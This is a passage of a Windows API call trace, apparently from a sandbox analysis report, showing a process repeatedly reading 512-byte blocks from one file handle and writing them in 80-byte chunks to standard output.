out: lpBuffer=0x16f280*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] GetFileType (hFile=0x4c) returned 0x1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f2d0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.528] GetFileType (hFile=0x4c) returned 0x1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.528] WriteFile (in: hFile=0x4c, lpBuffer=0x16f320*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f320*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.528] GetFileType (hFile=0x4c) returned 0x1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0139.528] WriteFile (in: hFile=0x4c, lpBuffer=0x16f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f370*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.528] GetFileType (hFile=0x4c) returned 0x1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.528] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f3c0*, lpNumberOfBytesWritten=0x16e3c4*=0x20, lpOverlapped=0x0) returned 1 [0139.528] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.528] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e3b0 | out: lpNewFilePointer=0x0) returned 1 [0139.528] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.528] ReadFile (in: hFile=0x54, lpBuffer=0x16f1e0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e3d0, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesRead=0x16e3d0*=0x200, lpOverlapped=0x0) returned 1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.528] GetFileType (hFile=0x4c) returned 0x1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.528] GetFileType (hFile=0x4c) returned 0x1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.528] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.528] GetFileType (hFile=0x4c) returned 0x1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.528] WriteFile (in: hFile=0x4c, lpBuffer=0x16f230*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f230*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 
[0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.528] GetFileType (hFile=0x4c) returned 0x1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.528] WriteFile (in: hFile=0x4c, lpBuffer=0x16f280*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f280*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.528] GetFileType (hFile=0x4c) returned 0x1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f2d0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] GetFileType (hFile=0x4c) returned 0x1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] WriteFile (in: hFile=0x4c, lpBuffer=0x16f320*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f320*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] GetFileType (hFile=0x4c) returned 0x1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] WriteFile (in: hFile=0x4c, lpBuffer=0x16f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f370*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] GetFileType (hFile=0x4c) returned 0x1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f3c0*, lpNumberOfBytesWritten=0x16e3c4*=0x20, lpOverlapped=0x0) returned 1 [0139.529] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0139.529] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e3b0 | out: lpNewFilePointer=0x0) returned 1 [0139.529] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.529] ReadFile (in: hFile=0x54, lpBuffer=0x16f1e0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e3d0, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesRead=0x16e3d0*=0x200, lpOverlapped=0x0) returned 1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] GetFileType (hFile=0x4c) returned 0x1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] GetFileType (hFile=0x4c) returned 0x1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] GetFileType (hFile=0x4c) returned 0x1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] WriteFile (in: hFile=0x4c, lpBuffer=0x16f230*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f230*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] GetFileType (hFile=0x4c) returned 0x1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] WriteFile (in: hFile=0x4c, lpBuffer=0x16f280*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f280*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] GetFileType (hFile=0x4c) returned 0x1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2d0*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f2d0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] GetFileType (hFile=0x4c) returned 0x1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] WriteFile (in: hFile=0x4c, lpBuffer=0x16f320*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f320*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] GetFileType (hFile=0x4c) returned 0x1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] WriteFile (in: hFile=0x4c, lpBuffer=0x16f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f370*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] GetFileType (hFile=0x4c) returned 0x1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f3c0*, lpNumberOfBytesWritten=0x16e3c4*=0x20, lpOverlapped=0x0) returned 1 [0139.530] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.530] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e3b0 | out: lpNewFilePointer=0x0) returned 1 [0139.530] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.530] ReadFile (in: hFile=0x54, lpBuffer=0x16f1e0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e3d0, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesRead=0x16e3d0*=0x200, lpOverlapped=0x0) returned 1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] GetFileType (hFile=0x4c) returned 0x1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] GetFileType 
(hFile=0x4c) returned 0x1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] GetFileType (hFile=0x4c) returned 0x1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] WriteFile (in: hFile=0x4c, lpBuffer=0x16f230*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f230*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] GetFileType (hFile=0x4c) returned 0x1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] WriteFile (in: hFile=0x4c, lpBuffer=0x16f280*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f280*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] GetFileType (hFile=0x4c) returned 0x1 [0139.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f2d0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] GetFileType (hFile=0x4c) returned 0x1 [0139.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] WriteFile (in: hFile=0x4c, lpBuffer=0x16f320*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f320*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] GetFileType (hFile=0x4c) returned 0x1 [0139.531] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] WriteFile (in: hFile=0x4c, lpBuffer=0x16f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f370*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] GetFileType (hFile=0x4c) returned 0x1 [0139.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f3c0*, lpNumberOfBytesWritten=0x16e3c4*=0x20, lpOverlapped=0x0) returned 1 [0139.531] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.531] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e3b0 | out: lpNewFilePointer=0x0) returned 1 [0139.531] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.531] ReadFile (in: hFile=0x54, lpBuffer=0x16f1e0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e3d0, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesRead=0x16e3d0*=0x200, lpOverlapped=0x0) returned 1 [0139.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] GetFileType (hFile=0x4c) returned 0x1 [0139.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] GetFileType (hFile=0x4c) returned 0x1 [0139.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] GetFileType (hFile=0x4c) returned 0x1 [0139.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] WriteFile (in: hFile=0x4c, lpBuffer=0x16f230*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f230*, 
lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] GetFileType (hFile=0x4c) returned 0x1 [0139.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] WriteFile (in: hFile=0x4c, lpBuffer=0x16f280*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f280*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] GetFileType (hFile=0x4c) returned 0x1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f2d0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] GetFileType (hFile=0x4c) returned 0x1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] WriteFile (in: hFile=0x4c, lpBuffer=0x16f320*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f320*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] GetFileType (hFile=0x4c) returned 0x1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] WriteFile (in: hFile=0x4c, lpBuffer=0x16f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f370*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] GetFileType (hFile=0x4c) returned 0x1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f3c0*, lpNumberOfBytesWritten=0x16e3c4*=0x20, 
lpOverlapped=0x0) returned 1 [0139.532] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.532] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e3b0 | out: lpNewFilePointer=0x0) returned 1 [0139.532] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.532] ReadFile (in: hFile=0x54, lpBuffer=0x16f1e0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e3d0, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesRead=0x16e3d0*=0x200, lpOverlapped=0x0) returned 1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] GetFileType (hFile=0x4c) returned 0x1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] GetFileType (hFile=0x4c) returned 0x1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] GetFileType (hFile=0x4c) returned 0x1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] WriteFile (in: hFile=0x4c, lpBuffer=0x16f230*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f230*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] GetFileType (hFile=0x4c) returned 0x1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] WriteFile (in: hFile=0x4c, lpBuffer=0x16f280*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f280*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.533] GetFileType (hFile=0x4c) returned 0x1 [0139.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.533] WriteFile (in: hFile=0x4c, 
lpBuffer=0x16f2d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f2d0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.533] GetFileType (hFile=0x4c) returned 0x1 [0139.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.533] WriteFile (in: hFile=0x4c, lpBuffer=0x16f320*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f320*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.533] GetFileType (hFile=0x4c) returned 0x1 [0139.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.533] WriteFile (in: hFile=0x4c, lpBuffer=0x16f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f370*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.533] GetFileType (hFile=0x4c) returned 0x1 [0139.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.533] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f3c0*, lpNumberOfBytesWritten=0x16e3c4*=0x20, lpOverlapped=0x0) returned 1 [0139.533] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.533] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e3b0 | out: lpNewFilePointer=0x0) returned 1 [0139.533] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.533] ReadFile (in: hFile=0x54, lpBuffer=0x16f1e0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e3d0, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesRead=0x16e3d0*=0x200, lpOverlapped=0x0) returned 1 [0139.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.533] GetFileType (hFile=0x4c) returned 0x1 [0139.533] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0139.533] GetFileType (hFile=0x4c) returned 0x1 [0139.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.533] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] GetFileType (hFile=0x4c) returned 0x1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] WriteFile (in: hFile=0x4c, lpBuffer=0x16f230*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f230*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] GetFileType (hFile=0x4c) returned 0x1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] WriteFile (in: hFile=0x4c, lpBuffer=0x16f280*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f280*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] GetFileType (hFile=0x4c) returned 0x1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f2d0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] GetFileType (hFile=0x4c) returned 0x1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] WriteFile (in: hFile=0x4c, lpBuffer=0x16f320*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f320*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0139.534] GetFileType (hFile=0x4c) returned 0x1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] WriteFile (in: hFile=0x4c, lpBuffer=0x16f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f370*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] GetFileType (hFile=0x4c) returned 0x1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f3c0*, lpNumberOfBytesWritten=0x16e3c4*=0x20, lpOverlapped=0x0) returned 1 [0139.534] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.534] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e3b0 | out: lpNewFilePointer=0x0) returned 1 [0139.534] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.534] ReadFile (in: hFile=0x54, lpBuffer=0x16f1e0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e3d0, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesRead=0x16e3d0*=0x200, lpOverlapped=0x0) returned 1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] GetFileType (hFile=0x4c) returned 0x1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] GetFileType (hFile=0x4c) returned 0x1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.535] GetFileType (hFile=0x4c) returned 0x1 [0139.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.535] WriteFile (in: hFile=0x4c, lpBuffer=0x16f230*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, 
lpOverlapped=0x0 | out: lpBuffer=0x16f230*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.535] GetFileType (hFile=0x4c) returned 0x1 [0139.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.535] WriteFile (in: hFile=0x4c, lpBuffer=0x16f280*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f280*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.535] GetFileType (hFile=0x4c) returned 0x1 [0139.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.535] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f2d0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.535] GetFileType (hFile=0x4c) returned 0x1 [0139.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.535] WriteFile (in: hFile=0x4c, lpBuffer=0x16f320*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f320*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.535] GetFileType (hFile=0x4c) returned 